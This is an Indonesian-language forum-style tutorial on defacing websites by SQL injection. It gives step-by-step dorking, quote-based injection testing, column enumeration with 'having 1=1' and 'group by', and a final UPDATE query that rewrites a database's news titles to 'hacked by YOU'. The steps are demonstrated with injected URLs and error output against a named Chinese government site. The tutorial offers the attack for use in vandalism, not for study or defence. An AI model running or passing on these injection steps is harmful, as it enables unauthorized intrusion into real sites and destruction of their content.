yah ni tutor gw tau dari anak|jendraL ..tutor pertama gw kenal deface

okok .langsung ke tkp :

1. cari target di google dengan keyword : default.asp?newsID=4352 ( contoh aja masih banyak kok yang lain)

2. uda dapet? contohnya : http://www.pyyr.gov.cn/new_show.asp?id=8887

3. cek bisa di injek apa gak dgn cara tambah kan tanda ‘ di akhir URL

http://www.pyyr.gov.cn/new_show.asp?id=8887′

klo errornya gini

Microsoft OLE DB Provider for ODBC Drivers 错误 ‘80040e14′

[Microsoft][ODBC SQL Server Driver][SQL Server]字符串 ” 之前有未闭合的引号。

/new_show.asp，行 89

maka lanjutkan perjuangan mu ok

4. Buat mencari bugnya gunakan having 1=1

http://www.pyyr.gov.cn/new_show.asp?id=8887 having 1=1

maka mucul pesan akan eror

Microsoft OLE DB Provider for ODBC Drivers 错误 ‘80040e14′

[Microsoft][ODBC SQL Server Driver][SQL Server]列 ‘main.id’ 在选择列表中无效，因为该列既不包含在聚合函数中，也不包含在 GROUP BY 子句中。

/new_show.asp，行 89

5. Uda ketemu kan coloumnya? itu tuh main.id

6. trus http://www.pyyr.gov.cn/new_show.asp?id=8887 group by main.id having 1=1;–

maka muncul pesan error :

Microsoft OLE DB Provider for ODBC Drivers 错误 ‘80040e14′

[Microsoft][ODBC SQL Server Driver][SQL Server]列 ‘main.title’ 在选择列表中无效，因为该列既不包含在聚合函数中，也不包含在 GROUP BY 子句中。

/new_show.asp，行 89

7. Uda ketemu kan titlenya ini nih main.title langsung aja update

http://www.pyyr.gov.cn/new_show.asp?id=8887 update main set title=’hacked by YOU’

diperhatiin kolomnya jangan ampe salah ya.

klo uda tinggal buka aja homenya

Jreeeng news smua berubah jadi defaced by YOU

thanks to anak|jendral, Ronald_Pa1000, bang Jo2, bang Hmei7